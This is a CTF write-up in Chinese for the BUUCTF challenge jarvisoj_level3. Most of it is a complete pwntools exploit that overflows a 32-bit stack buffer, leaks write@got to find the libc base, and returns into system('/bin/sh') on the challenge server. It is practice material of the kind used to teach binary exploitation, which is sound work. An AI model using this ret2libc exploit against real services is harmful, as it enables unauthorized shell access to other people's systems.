BUUCTF | jarvisoj_level3
本题思路与 pwn2_sctf_2016 类似，这里只简单描述。
1.checksec

2.ida

栈溢出；程序本身没有 system，也没有可直接利用的 /bin/sh；开启了 NX 保护，不能在栈上执行 shellcode，所以先用 write 把 write@got 的内容打印出来泄露 libc 地址，再返回 main 进行第二次溢出做 ret2libc。
3.libc 版本

泄露出 write 的真实地址后即可确定 libc 版本（本题 exp 使用 libc-2.23.so，32 位；也可用 LibcSearcher 按地址低 12 位匹配），把对应的 libc 下载到脚本同目录即可。注意：如果版本选错，算出的 libc_base 低 12 位不会为 0（不是页对齐），可据此快速排查。
完整exp:
import struct

from pwn import *
from LibcSearcher import *
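# buf sits at ebp-0x88 inside vulnerable_function; the extra 4 bytes overwrite the saved ebp,
# so the next dword written lands on the saved return address.
PADDING = b'M' * (0x88 + 4)


def build_leak_payload(plt_write: int, ret_addr: int, got_write: int) -> bytes:
    """Return the stage-1 payload: overflow into write(1, got_write, 4), then return to ret_addr.

    32-bit cdecl layout after the padding: write@plt, the address write returns to
    (main, so the program asks for input again), then write's three arguments
    fd=1, buf=got_write, count=4.
    """
    return (PADDING
            + struct.pack('<I', plt_write)
            + struct.pack('<I', ret_addr)
            + struct.pack('<I', 1)
            + struct.pack('<I', got_write)
            + struct.pack('<I', 4))


def build_system_payload(p_system: int, p_binsh: int) -> bytes:
    """Return the stage-2 payload: overflow into system("/bin/sh").

    The 4 bytes between system and its argument are system's return address; it is
    never used once the shell is spawned, so any filler works.
    """
    return PADDING + struct.pack('<I', p_system) + b'aaaa' + struct.pack('<I', p_binsh)


def libc_base_from_leak(leaked_write: int, libc_write_offset: int) -> int:
    """Compute the libc load base from the leaked write address.

    Raises ValueError when the result is not page-aligned: that means the leak was
    read wrongly or the local libc does not match the remote one, and stage 2
    would only crash the target.
    """
    base = leaked_write - libc_write_offset
    if base & 0xfff:
        raise ValueError(f"libc base {base:#x} is not page-aligned; wrong libc or bad leak")
    return base


if __name__ == "__main__":
    context.log_level = 'debug'
    p = remote('node5.buuoj.cn', 29052)
    elf = ELF('./level3')
    # main is the stage-1 return target; fall back to the known address if the
    # binary has no symbol for it.
    p_main = elf.symbols.get('main', 0x08048484)
    plt_write = elf.plt['write']
    got_write = elf.got['write']

    # stage 1: leak write@got, come back to main for a second overflow
    p.recvuntil(b'Input:\n')
    p.send(build_leak_payload(plt_write, p_main, got_write))
    # recvn reads exactly 4 bytes; recv(4) may return fewer and corrupt the leak
    addr = u32(p.recvn(4))
    log.info("write@libc = %#x", addr)

    libc = ELF('./libc-2.23.so')
    libc_base = libc_base_from_leak(addr, libc.symbols['write'])
    p_system = libc_base + libc.symbols['system']
    p_binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

    # stage 2: ret2libc system("/bin/sh")
    p.recvuntil(b'Input:\n')
    p.send(build_system_payload(p_system, p_binsh))
    p.interactive()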